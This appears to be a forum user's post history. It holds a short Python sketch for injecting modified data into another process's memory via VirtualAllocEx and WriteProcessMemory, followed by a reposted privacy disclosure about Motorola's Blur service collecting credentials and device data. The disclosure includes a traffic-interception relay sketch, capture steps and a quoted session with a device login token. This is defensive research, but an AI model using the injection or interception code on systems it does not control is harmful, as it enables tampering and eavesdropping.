Everything posted by Nytro (Posts: 18736, Days Won: 711)
1. Is this a kind of Kickstarter where the investment is $500?
2. Of those $500, how much goes to the developer? Or is the developer's work not considered "part of the project"?
3. Who holds the copyright to the project if it wins?
4. After a project wins, what happens next? How is it developed?

These are just a few questions I'm asking to make sure everything is in order.
-
A detailed tutorial on how it works would be nice.
11 replies
Tagged with: criptografie, photobear (and 3 more)
Yes, the data can be modified. The most practical approach is to allocate memory in the target process (VirtualAllocEx), copy the modified data into that buffer, and then, when the function is called, use the new data (the pointer you allocated) instead of the original.
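A minimal sketch of that approach in Python with ctypes (assuming you already hold an open handle to the target process; `build_payload` and `inject_buffer` are illustrative names, not an existing API, and the WinAPI calls naturally only work on Windows):

```python
import ctypes
import sys

MEM_COMMIT_RESERVE = 0x3000   # MEM_COMMIT | MEM_RESERVE
PAGE_READWRITE = 0x04

def build_payload(original: bytes, patches: dict) -> bytes:
    """Apply byte-level patches (offset -> replacement bytes) to a copy
    of the data captured from the original function argument."""
    buf = bytearray(original)
    for offset, new_bytes in patches.items():
        buf[offset:offset + len(new_bytes)] = new_bytes
    return bytes(buf)

def inject_buffer(process_handle, payload: bytes) -> int:
    """Allocate memory in the target process with VirtualAllocEx, copy
    the modified data there with WriteProcessMemory, and return the
    remote address -- the pointer you substitute for the original
    argument when the hooked function is invoked."""
    if sys.platform != "win32":
        raise OSError("Windows-only sketch")
    k32 = ctypes.windll.kernel32
    remote = k32.VirtualAllocEx(process_handle, None, len(payload),
                                MEM_COMMIT_RESERVE, PAGE_READWRITE)
    if not remote:
        raise ctypes.WinError()
    written = ctypes.c_size_t(0)
    if not k32.WriteProcessMemory(process_handle, remote, payload,
                                  len(payload), ctypes.byref(written)):
        raise ctypes.WinError()
    return remote
```

The same two calls (VirtualAllocEx plus WriteProcessMemory) are what you would make from C inside a hooking DLL; the patching step is just ordinary byte manipulation on the captured argument.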
-
Motorola Is Listening
article by Ben Lincoln

In June of 2013, I made an interesting discovery about the Android phone (a Motorola Droid X2) I was using at the time: it was silently sending a considerable amount of sensitive information to Motorola, and to compound the problem, a great deal of it was sent over an unencrypted HTTP channel. If you're in a hurry, you can skip straight to the Analysis - email, ActiveSync, and social networking section - that's where the most sensitive information (e.g. email/social network account passwords) is discussed.

Technical notes

The screenshots and other data in this article are more heavily redacted than I would prefer in the interest of full disclosure and supporting evidence. There are several reasons for this:

- There is a considerable amount of binary, hex-encoded, and base64-encoded data mixed in with the traffic. As I have not performed a full reverse-engineering of the protocol, it's hard for me to know whether any of these values are sensitive now, or will turn out to be once someone decodes the protocol more thoroughly.
- My employer reminds its employees that publicly identifying themselves as employees of that organization conveys certain responsibilities upon them. I do not speak for my employer, so all information that would indicate who that employer is has been removed.
- I would rather not expose my personal information any more than Motorola already has.

Discovery

I was using my personal phone at work to do some testing related to Microsoft Exchange ActiveSync. In order to monitor the traffic, I had configured my phone to proxy all HTTP and HTTPS traffic through Burp Suite Professional - an intercepting proxy that we use for penetration testing - so that I could easily view the contents of the ActiveSync communication. Looking through the proxy history, I saw frequent HTTP connections to ws-cloud112-blur.svcmot.com mixed in with the expected ActiveSync connections.
[Screenshot: ActiveSync configuration information being sent to Motorola's Blur service.]

As of 22 June 2013, svcmot.com is a domain owned by Motorola, or more specifically:

Motorola Trademark Holdings, LLC
600 North US Highway 45
Attn: Law Department
Libertyville IL 60048 US
internic@motorola.com
+1.8475765000 Fax: +1.8475234348

I was quickly able to determine that the connections to Motorola were triggered every time I updated the ActiveSync configuration on my phone, and that the unencrypted HTTP traffic contained the following data:

- The DNS name of the ActiveSync server (only sent when the configuration is first created).
- The domain name and user ID I specified for authentication.
- The full email address of the account.
- The name of the connection.

As I looked through more of the proxy history, I could see less-frequent connections in which larger chunks of data were sent - for example, a list of all the application shortcuts and widgets on my phone's home screen(s).

Analysis - email, ActiveSync, and social networking

I decided to try setting up each of the other account types the system would allow, to find out what was captured.

Facebook and Twitter

For both of these services, the email address and password for the account are sent to Motorola. Both services support a mechanism (OAuth) explicitly intended to make this unnecessary, but Motorola does not use that more secure mechanism.
The password is only sent over HTTPS, so at least it can't be easily intercepted by most third parties. Most subsequent connectivity to both services (other than downloading images) is proxied through Motorola's system on the internet using unencrypted HTTP, so Motorola and anyone running a network capture can easily see who your friends/contacts are (including your friends' email addresses), what posts you're reading and writing, and so on. They'll also get a list of which images you're viewing, even though the actual image download comes directly from the source.

[Screenshots: Facebook and Twitter data sent to Motorola's Blur service - Facebook password; Facebook friend information; Facebook wall post by friend; Facebook wall post by self; Silent Signon; Twitter password; Twitter following information; Twitter post; Twitter posts are also read through Blur. You know your software is trustworthy and has nothing to hide when it has a function called "silent signon".]

Photobucket and Picasa

For both services, the email address and password are sent to Motorola over HTTPS. For Photobucket, the username and image URLs are sent over unencrypted HTTP. For Picasa, the email address, display name, friend information, and image URLs are sent over unencrypted HTTP. During my testing of Photobucket, the photo was uploaded through Motorola's system (over HTTPS). I was not able to successfully upload a photo to Picasa, although it appeared that the same would have been true for that service.
[Screenshots: Photobucket and Picasa data sent to Motorola's Blur service - Photobucket password; Photobucket user ID and friend information; Picasa password; Picasa name and friend information.]

Photo uploads (to Facebook, Photobucket, etc.)

When uploading images, the uploaded image passes through Motorola's Blur servers, and at least some of the time it is uploaded with its EXIF data intact. EXIF data is where things like GPS coordinates are stored. The full path of the original image on the device is also sent to Motorola - for example, /mnt/sdcard/dcim/Camera/2013-06-20_09-00-00_000.jpg. Android devices name phone-camera images using the time they were taken, with millisecond resolution, which can almost certainly be used as a unique device identifier for your phone (how many other people were taking a picture at exactly that millisecond?), assuming you leave the original photo on your phone.
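To see why that filename format is so identifying: it encodes the capture time down to the millisecond. A quick sketch of recovering the timestamp (the function name is mine, not from the article):

```python
from datetime import datetime

def parse_camera_filename(name: str) -> datetime:
    """Parse an Android camera filename such as
    '2013-06-20_09-00-00_000.jpg' into a datetime.
    The trailing underscore-separated field is milliseconds."""
    stem = name.rsplit(".", 1)[0]
    date_part, time_part, millis = stem.split("_")
    dt = datetime.strptime(date_part + " " + time_part, "%Y-%m-%d %H-%M-%S")
    return dt.replace(microsecond=int(millis) * 1000)
```

With 86.4 million distinct millisecond values per day, two phones producing the same filename is very unlikely, which is what makes the uploaded path a workable device fingerprint.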
[Screenshots: Data sent to Motorola's Blur service when uploading photos - Full local path; EXIF data; Service username and tags.]

YouTube

The email address and password are sent to Motorola over HTTPS. The email address is also sent over unencrypted HTTP, along with some other data that I haven't deciphered. I didn't have time to create and upload a video, so I'm not sure what else might be sent.

[Screenshots: YouTube data sent to Motorola's Blur service - YouTube password; Email address.]

Exchange ActiveSync

The domain name, username, email address, and name of the connection are sent over unencrypted HTTP.
When a new connection is created, the Exchange ActiveSync server's DNS name is also sent.

[Screenshot: Exchange ActiveSync data sent to Motorola's Blur service - EAS initial setup.]

IMAP/POP3 email

The email address, inbound/outbound server names, and the name of the connection are sent over unencrypted HTTP. There is a lot of other encoded/encrypted data included which I haven't deciphered.

[Screenshot: IMAP account data sent to Motorola's Blur service - IMAP configuration. One of the few screenshots in which I can leave some of the important details visible - in this case, because the account in question is already on every spam list in the world.]

Yahoo Mail

The email address is sent over unencrypted HTTP. This type of account seems to be handled in at least roughly the correct way by Motorola's software, in that a request is made for an access token and, as far as I can tell, the actual account password is never sent to Motorola.
[Screenshot: Yahoo Mail data sent to Motorola's Blur service - Yahoo Mail address.]

Flickr

Similar to the Yahoo Mail results, but actually one step better - an explicit Flickr prompt appears indicating what permissions Motorola's system is asking for on behalf of the user.

[Screenshot: Flickr permission screen. The Flickr integration behaves the way every other part of Motorola's Blur service should.]

GMail/Google

Interestingly, no data seemed to be sent to Motorola about this type of account. Unfortunately, if anyone adds a YouTube or Picasa account, they've sent their GMail/Google+ credentials to Motorola anyway. Also interestingly, while testing Picasa and/or YouTube integration, Motorola's methods of authenticating actually tripped Google's suspicious-activity alarm. Looking up the source IP in ARIN confirmed the connection was coming from Motorola.
[Screenshots: Google, on guard against suspicious vendors - Suspicious activity detected; Source of the suspicious activity confirmed.]

Firefox Sync

No data seems to pass through Motorola's servers.

News / RSS

RSS feeds subscribed to using the built-in News application are proxied through Motorola's servers over unencrypted HTTP.

[Screenshot: RSS / News sync data sent to Motorola's Blur service.]

Other data

Every few minutes, my phone sends Motorola a detailed description of my home screen/workspace configuration - all of the shortcuts and widgets I have on it.
[Screenshots: Home screen configuration and other data sent to Motorola's Blur service - Home screen configuration; Universal account IDs. "Universal account IDs"? Is that why I only see some data sent the very first time I configure a particular account on my phone?]

Analysis - "check-in" data

As I was looking through the data I've already mentioned, I noticed chunks of "check-in" data in a binary upload, and I thought I'd see whether it was in some sort of standard compressed format. As it turns out, it is - the 0x1F8B highlighted below is the header for a block of gzip-compressed data.

[Screenshot: GZip compressed-data header (0x1F8B) embedded in check-in data.]

What is contained in this data is essentially debug-level log entries from the device.
The battery drain and bandwidth use from having the phone set up like this must be unbelievable. Most of the data that's uploaded is harmless or low-risk on its own - use statistics, and so on. However, this is another mechanism by which Motorola's servers are collecting information like account names/email addresses, and the sheer volume and variety of other data makes me concerned that Motorola's staff apparently care so much about how I'm using my phone. If this were a corporate-owned device, I would expect the owning corporation to have this level of system data collection enabled, but it concerns me that it's being silently collected from my personal device, and that there is no way to disable it.

Information that is definitely being collected

- The IMEI and IMSI of the phone. These are referred to as MEID and MIN in the phone's UI and on the label in the battery compartment, but as IMEI and IMSI in the logs. I believe these two values are all that's needed to clone a phone, if someone were to intercept the traffic.
- The phone number of the phone, and carrier information (e.g. Verizon).
- The barcode from inside the battery compartment.
- Applications included with the device, as well as those installed by the user.
- Statistics about how those applications are used (e.g. how much data each one has sent and received).
- Phone call and text message statistics - for example, how many calls have been received or missed.
- Bluetooth device pairing and unpairing, including detailed information about those devices.
- Email addresses/usernames for accounts configured on the device.
- Contact statistics (e.g. how many contacts are synced from Google, how many Facebook users are friends of the account I've configured on the device).
- Device-level event logs (these are sent to Google as well, by a Google-developed check-in mechanism).
- Debugging/troubleshooting information about most activities the phone engages in.
- Signal-strength statistics and data use for each type of radio included in the device - for example, bytes sent/received via 3G versus wifi.
- Stack memory and register dumps related to applications which have crashed.
- For Exchange ActiveSync setup, the server name and email address, as well as the details of the security policy enforced by that EAS server.

Information that may be being collected

The terms-of-use/privacy policy for the Blur service (whether you know you're using it or not) explicitly specifies that location information (e.g. GPS coordinates) may be collected (see Speaking of that privacy policy..., below). I have not seen this in the data I've intercepted. This may be because it is represented in a non-obvious format, or it may only be collected under certain conditions, or only by newer devices than my two-year-old Droid X2.

While I have no conclusive evidence, I did notice while adding and removing accounts from my phone that the account ID number for a newly-added account is always higher than that of any account that existed previously on the device, even if those accounts have been deleted. This implies to me that Motorola's Blur service may be storing information about the accounts I've "deleted" even though they're no longer visible to me. This seems even more likely given the references in the communication to "universalAccountIds" and "knownAccountIds", referenced by GUID/UUID-like values.
[Screenshots: Check-in data being sent to Motorola - Application use stats; Basic hardware properties; Bluetooth headset use-tracking; Data use, SMS text, contact, and CPU stats; Label in the battery compartment of my phone; BlurID, IMEI and barcode (from label), IMSI and phone number; EAS setup information; EAS policy elements; Email and disk stats; Event logs (these are also captured by Google); Image upload bug; Logging of newly-installed applications; Missed calls; I told you it was syncing every nine minutes!; Possible client-side SQL injection vulnerability; Radio and per-application stats (e.g. CPU use by app); Register and stack memory dump; Sync App IDs: 10, 31, 80; Sync App IDs: 40, 70, 20, 2, 60, and 5; System panic auto-reboot. The "sync app ID" information will become more important in the section about XMPP. The system panic message has all of the regular boot information as well as the reason for the OS auto-reboot (in my case, apparently there is a problem with the modem).]

Analysis - Jabber / XMPP stream communication

In some of the check-in logs, I saw entries that read e.g.:

XMPPConnection: Preparing to connect user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222
XMPPConnectionManager I:onConfigurationUpdate: entered
XMPPConnectionManager I:onConfigurationUpdate: exiting
WSBase I:mother told us it's okay to retry the waiting requests: 0
NormalAsyncConnection I:Connected local addr: 192.168.253.10/192.168.253.10:60737 to remote addr: jabber-cloud112-blur.svcmot.com/69.10.176.46:5222
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 212 bytes of data with 0 bytes remaining.
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 202 bytes into buffer
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 262 bytes into buffer
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 78 bytes of data with 0 bytes remaining.
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 1448 bytes into buffer
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 2896 bytes into buffer
XMPPConnection I:Finished connecting user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222

By running a network capture, I was able to confirm that my phone was regularly attempting this type of connection. However, it was encrypted using TLS, so I couldn't see the content of the communication at first. The existence of this mechanism made me extremely curious. Why did Motorola need yet another communication channel for my phone to talk to them? Why were they using a protocol intended for instant messaging/chat? The whole thing sounded very much like a botnet (which often uses IRC in this way) to me.

Intercepting these communications ended up being much more work than I expected. XMPP is an XML-based protocol which cannot be proxied by an HTTP/HTTPS proxy, so using Burp Suite or ZAP was out. My first thought was to use Mallory, an intercepting transparent proxy that I learned about in the outstanding SANS SEC 642 class back in March of 2013. Mallory is a relatively new tool, and is somewhat finicky to set up, but I learned a lot doing so. Unfortunately, XMPP is not a protocol that Mallory can intercept as of this writing. The VM that I built to run Mallory on still proved useful in this case, as I was eventually able to hack together a custom XMPP man-in-the-middle tool and view the contents of the traffic.
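The core of such a man-in-the-middle tool is just a TCP relay that records everything passing through it; for a TLS stream you additionally terminate the client side with your own certificate and re-encrypt toward the real server. A stripped-down sketch of the relay part (names are mine, and it handles a single connection only):

```python
import socket
import threading

def relay_once(listen_port, target_host, target_port, log):
    """Accept one client on listen_port, open a connection to the real
    server, and shuttle bytes in both directions, appending every chunk
    to `log` before forwarding it."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", listen_port))
    srv.listen(1)
    client, _ = srv.accept()
    upstream = socket.create_connection((target_host, target_port))

    def pump(src, dst, tag):
        try:
            while True:
                chunk = src.recv(4096)
                if not chunk:
                    break
                log.append((tag, chunk))      # observe traffic before forwarding
                dst.sendall(chunk)
        except OSError:
            pass
        finally:
            try:
                dst.shutdown(socket.SHUT_WR)  # propagate half-close
            except OSError:
                pass

    c2s = threading.Thread(target=pump, args=(client, upstream, "C->S"))
    s2c = threading.Thread(target=pump, args=(upstream, client, "S->C"))
    c2s.start(); s2c.start()
    c2s.join(); s2c.join()
    client.close(); upstream.close(); srv.close()
```

Pointing the phone's XMPP hostname at the relay (e.g. via DNS or iptables redirection) is what lets the plaintext of the negotiation be captured before the TLS layer is added.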
If you'd like to know more about the details, they're in the Steps to reproduce - XMPP communication channel section further down this page.

This channel is at least part of the Motorola Blur command-and-control mechanism. I haven't seen enough distinct traffic pass through it to have a good idea of the full extent of its capabilities, but I know that:

- The XMPP/Jabber protocol is re-purposed for command-and-control use. For example, certain types of message are sent using the field normally used for "presence" status in IM.
- The values exchanged in the presence fields appear to be very short (five-character) base64-encoded binary data, followed by a dash and then a sequence number - for example, 4eTO3-52, Ugs6j-10, or t2bcA-0. The base64 value appears to be selected at boot. The sequence number is incremented differently based on criteria I don't understand (yet), but the most common step I've seen is +4.
- As long as the channel is open, the phone will check in with Motorola every nine minutes.
- At least one type of Motorola-to-phone command exists: a trigger to update software by ID number. At least three such ID numbers exist: 31, 40, and 70 (see the table below). Each of these triggers an HTTP POST request to the blur-services-1.0/ws/sync API method seen in the previous section, and the same IDs are logged in the check-in data.
- The stream token and username passed to the service are the "blurid" value (represented as a decimal number) which shows up in various places in the other traffic between the phone and Motorola.

ID | Name                     | Purpose                                                                    | Data Format | Observed In Testing?
 2 | BlurSettingsSyncHandler  | Unknown                                                                    | JSON        | No
 5 | BlurSetupSyncHandler     | Unverified - called when a new type of sync needs to be added?             | gpb         | Yes
10 | BlurContactsSyncHandler  | Syncs contact information (e.g. Google account contacts)                   | gpb         | No
20 | SNMailSyncHandler        | Unverified - probably syncs private messages from social networking sites  | gpb         | No
31 | StatusSyncHandler        | Syncs current status/most-recent-post information from social networking sites | gpb     | Yes
40 | BlurSNFriendsSyncHandler | Syncs friend information from social networking sites                      | gpb         | Yes
50 | NewsRetrievalService     | Syncs news feeds set up in the built-in Motorola app                       | gpb         | Yes
60 | AdminFlunkySyncHandler   | Unverified - sounds like some sort of remote-support functionality         | gpb         | No
70 | FeedReceiverService      | Unknown                                                                    | gpb         | Yes
80 | SNCommentsSyncHandler    | Syncs status/comment information from social networking sites              | gpb         | Yes

The "gpb" data format is how that type of binary encoding is referred to internally by the client logs. I believe it is similar (possibly identical) to Google's "protocol buffer" system.

Here is an example session, including the SYNC APP command being sent by the server. Traffic from the client is prefixed with C:, traffic from the server with S:.

C: <stream:stream token="XXXXXXXXXXXXXXXX" to="jabber-cloud112-blur.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0"><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"/>
S: <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0">
S: <stream:features><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"></starttls><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features><proceed xmlns="urn:ietf:params:xml:ns:xmpp-tls"/>

[Communication after this point takes place over the encrypted channel which the client and server have negotiated.]
<stream:stream token="XXXXXXXXXXXXXXXX" to="xmpp.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0"> <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0"><stream:features><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features> <iq id="4eTO3-24" type="set"><query xmlns="jabber:iq:auth"><username>4503600105521277</username><password>1-d052e26d5bbb5b4adce7965e3e248a331765623714</password><resource>BlurDevice</resource></query></iq><iq id="4eTO3-25" type="get"><query xmlns="jabber:iq:roster"></query></iq><presence id="4eTO3-26"></presence> <iq type="result" id="4eTO3-24"/> <message xmlns="urn:xmpp:motorola:motodata" id="0J8Hc-30570875" to="XXXXXXXXXXXXXXXX@jabber01.mm211.dc2b.svcmot.com"><data xmlns="com:motorola:blur:push:data:1">{"Sync":{"APP":[{"d":"sync_app_id: 31\n","q":0}]}}</data></message> [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] XMPP communication channel [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] XMPPPeek in action [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 31 (social networking status) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 40 (friends) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 50 (news) sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: 
InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] App ID 80 (social networking comments and status) sync [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] A few examples of the sync operations triggered by the XMPP communication channel. [/TD] [/TR] [/TABLE] While I have seen very little sensitive data being sent as a result of this mechanism, Motorola's privacy policy/terms-of-service related to this system makes me more concerned. There is literally no reason I can think of that I would want my phone to check in with Motorola every nine minutes to see if Motorola has any new instructions for it to execute. Is there some sort of remote-control capability intended for use by support staff? I know there is a device-location and remote wipe function, because those are advertised as features of Blur (apparently even if you didn't explicitly sign up for Blur). Speaking of that privacy policy... I honestly can't remember if I explicitly agreed to any sort of EULA when I originally set up my phone. There are numerous "terms of service" and "privacy policy" documents on the Motorola website which all seem designed to look superficially identical, but this one in particular (the one for the actual "Motorola Mobile Services" system (AKA "Blur")) has a lot of content I really don't like, and which is not present in the other, similar documents on their site that are much easier to find. For example, it specifically mentions capturing social networking credentials, as well as uploading GPS coordinates from customers' phones to Motorola. It is specific to "Motorola Mobile Services", and I know I didn't explicitly sign up for that type of account (which is probably why my phone is using a randomly-generated username and password to connect). 
I also know that even if I was presented with a lengthy statement which included statements about storing social media credentials, that happened when I originally bought the phone (about two years ago). Should I not have been at least reminded of this when I went to add a social networking account for the first time? Or at a bare minimum, should my phone not let me view any document I allegedly agreed to? The only reason I know of that particular TOS is because I found it referenced in a Motorola forum discussion about privacy concerns. In any case, here are some interesting excerpts from that document (as of 22 June, 2013). All bold emphasis is mine. I am not a lawyer, and this is not legal advice. Using the MOTOROLA MOBILE SERVICES software and services (MOTOROLA MOBILE SERVICES) constitutes your acceptance of the terms of the Agreement without modification. If you do not accept the terms of the Agreement, then you may not use MOTOROLA MOBILE SERVICES. Motorola collects and uses certain information about you and your mobile device ... (1) your device's unique serial number ... (5) when your device experiences a software crash ... (1) use of hardware functions like the accelerometer, GPS, wireless antennas, and touchscreen; (2) wireless carrier and network information; (3) use of accessories like headsets and docks; (4) data usage ... Personal Information such as: (1) your email and social network account credentials; (2) user settings and preferences; (3) your email and social network contacts; (4) your mobile phone number; and (5) the performance of applications installed on your device. ... MOTOROLA MOBILE SERVICES will never collect the specific content of your communications or copies of your files. The document makes a promise that the content of communications are not collected, but I have screenshots and raw data that show Facebook and Twitter messages as well as photos passing through their servers. 
The agreement specifies "when your device experiences a software crash", not "memory dumps taken at the time of a software crash", which are what is actually collected. Motorola takes privacy protection seriously. MOTOROLA MOBILE SERVICES only collects personal information, social network profile data, and information about websites you visit if you create a MotoCast ID, use the preinstalled web browser and/or MOTOROLA MOBILE SERVICES applications and widgets like Messaging, Gallery, Music Player, Social Networking and Social Status. If you use non-Motorola applications for email, social networking, sharing content with your friends, and web browsing, then MOTOROLA MOBILE SERVICES will not collect this information. Even if you decline to use the preinstalled browser or the MOTOROLA MOBILE SERVICES applications and widgets, your device will continue to collect information about the performance of your mobile device and how you use your mobile device unless you choose to opt out. In non-Motorola builds of Android, most/all of those components are still present, but none of them send data to Motorola. Some people might think it was extremely deceptive to add data collection to those components but not make user-visible changes to them that mentioned this. Oh, and of course the OS is still collecting massive amounts of data even if you don't use the modified basic Android functionality. MOTOROLA MOBILE SERVICES only collects and uses information about the location of your mobile device if you have enabled one or more location-based services, such as your device's GPS antenna, Google Location Services, or a carrier-provided location service. If you turn these features off in your mobile device's settings, MOTOROLA MOBILE SERVICES will not record the location of your mobile device. So what you're saying is that all I have to do to prevent Motorola from tracking my physical location is disable core functionality on my device and leave it off permanently? Awesome! 
Thanks so much! The security of your information is important to Motorola. When MOTOROLA MOBILE SERVICES transmits information from your mobile device to Motorola, MOTOROLA MOBILE SERVICES encrypts the transmission of that information using secure socket layer technology (SSL). Except when it doesn't, which is most of the time. However, no data stored on a mobile device or transmitted over a wireless or interactive network can ever be 100 percent secure, and many of the communications you make using MOTOROLA MOBILE SERVICES will be accessible to third parties. You should therefore be cautious when submitting any personally identifiable information using MOTOROLA MOBILE SERVICES, and you understand that you are using MOTOROLA MOBILE SERVICES at your own risk. As a global company, Motorola has international sites and users all over the world. The personal information you provide may be transmitted, used, stored, and otherwise processed outside of the country where you submitted that information, including jurisdictions that may not have data privacy laws that provide equivalent protection to such laws in your home country. You may not ... interfere with anyone's ... enjoyment of the Services Uh oh. That document does mention that anyone who wants to opt-out can email privacy@motorola.com. If you have any luck with that, please let me know. Why this is a problem While I'm sure there are a few people out there who don't mind a major multinational corporation collecting this sort of detailed tracking information related to where their phone has been and how it's been used, I believe most people would at least like to be asked about participating in this type of activity, and be given an option to turn it off. I can think of many ways that Motorola, unethical employees of Motorola, or unauthorized third parties could misuse this enormous treasure trove of information. 
But the biggest question on my mind is this: now that it is known that Motorola is collecting this data, can it be subpoenaed in criminal or civil cases against owners of Motorola phones? That seems like an enormous can of worms, even in comparison to the possibilities for identity theft that Motorola's system provides for. How secure is Motorola's Blur web service against attack? I'd be really interested to test this myself, but made no attempt to do so because I don't have permission and Motorola doesn't appear to have a "white hat"/"bug bounty" programme. It would be a tempting target for technically-skilled criminals, due to the large volume of Facebook, Twitter, and Google usernames and passwords stored in it. The fact that the phone actively polls Motorola for new instructions to execute and then follows those instructions without informing its owner opens all of these phones up to automated takeover by anyone who can obtain a signing SSL certificate issued by one of the authorities in the trusted CA store on those phones. Some people may consider this far-fetched, but consider that certificates of that type have been mistakenly issued in the past, and the root certificate for at least one of the CAs responsible for that type of mistake (TURKTRUST) was installed on my phone at the factory. Is there anything good to be found here? Motorola does appear to be using reasonably-strong authentication for the oAuth login to their system - the username seems to be a combination of the IMEI and a random number (16 digits long[2], in the case of my phone's username), and the password is a 160-bit value represented as a hex string. This would be essentially impossible to attack via brute-force if the value really is random. Due to its length, I'm concerned it's a hash of a fixed attribute of the phone, but that's just a hunch. The non-oAuth components (e.g. XMPP) use the Blur ID as the username, and that is all over the place, e.g.
in virtually every URL (HTTP and HTTPS) that the client accesses on the Blur servers. When uploading images to social networking sites, the Motorola software on the phone sometimes strips the EXIF tags (including geolocation tags) before uploading the image to Motorola. So at least they can't always use that as another method for determining your location. Finally, both the XMPP and HTTPS client components of the software do validate that the certificates used for encrypted communication were issued by authorities the phone is configured to trust. If the certificate presented to either component is not trusted, then no encrypted channel is established, and data which would be sent over it is queued until a trusted connection can be made. If someone wants to perform a man-in-the-middle attack, they're going to need to get their root CA cert loaded on the target phones, or obtain a signing cert issued by a trusted authority (e.g. TURKTRUST). [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] At least their software checks SSL cert validity [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Untrusted cert - HTTPS client [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Untrusted cert - XMPP client [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Has anyone else discovered this? 
In January of 2012, a participant in a Motorola pre-release test discovered that Motorola was performing device-tracking after a Motorola support representative mentioned that the tester had reset his phone "21 times", and a forum moderator directed him to the special, hard-to-find Motorola privacy policy discussed above. To my knowledge, this article is the first disclosure of anything like the full extent of the data Motorola collects. What I am going to do as a result of this discovery As of 23 June 2013, I've removed my ActiveSync configuration from the phone, because I can't guarantee that proprietary corporate information isn't being funneled through Motorola's servers. I know that some information (like the name of our ActiveSync server, our domain name, and a few examples of our account-naming conventions) is, but I don't have time to exhaustively test to see what else is being sent their way, or to do that every time the phone updates its configuration. I've also deleted the IMAP configuration that connected to my personal email, and have installed K-9 Mail as a temporary workaround. I'm going to figure out how to root this phone and install a "clean" version of Android. That will mean I can't use ActiveSync (my employer doesn't allow rooted phones to connect), which means a major reason I use my phone will disappear, but better that than risk sending their data to Motorola. I'll assume that other manufacturers and carriers have their own equivalent of this - recall the Carrier IQ revelation from 2011. Which other models of Motorola device do this? Right now, I have only tested my Droid X2. If you have a Motorola device and are technically-inclined, the steps to reproduce my testing are in the section below. If you get results either way and would like me to include them here, please get in touch with me using the Contact form. Please include the model of your device, the results of your testing, and your name/nickname/handle/URL/etc. 
if you'd like to be identified. Steps to reproduce - HTTP/HTTPS data capture There are a number of approaches that can be used to reproduce the results in this article. This is the method that I used. Of course, the same testing can be performed in order to validate that non-Motorola devices are or are not behaving this way. Important: I strongly recommend that you do not modify in any way the data your phone sends to Motorola. I also strongly recommend that you do not actively probe, scan, or test in any way the Blur web service. The instructions on this page are intended to provide a means of passively observing the traffic to Motorola in order to understand what your phone may be doing without your knowledge or consent. Connect a wireless access point to a PC which has at least two NICs. Use Windows Internet Connection Sharing to give internet access to the wireless AP and its clients. Set up an intercepting proxy on the PC. I used Burp Suite Professional for the first part of my testing, then switched to OWASP ZAP (which is free) for the rest, since I used a personal system for that phase. Make sure the proxy is accessible on at least one non-loopback address so that other devices can proxy through it.[1] Configure a Motorola Android device to connect to the wireless AP, and to use the intercepting proxy for its web traffic (in the properties for that wireless connection). Install the root signing certificate for the intercepting proxy on the Motorola Android device. This allows the intercepting proxy to view HTTPS traffic as well as unencrypted HTTP. Power the Motorola Android device 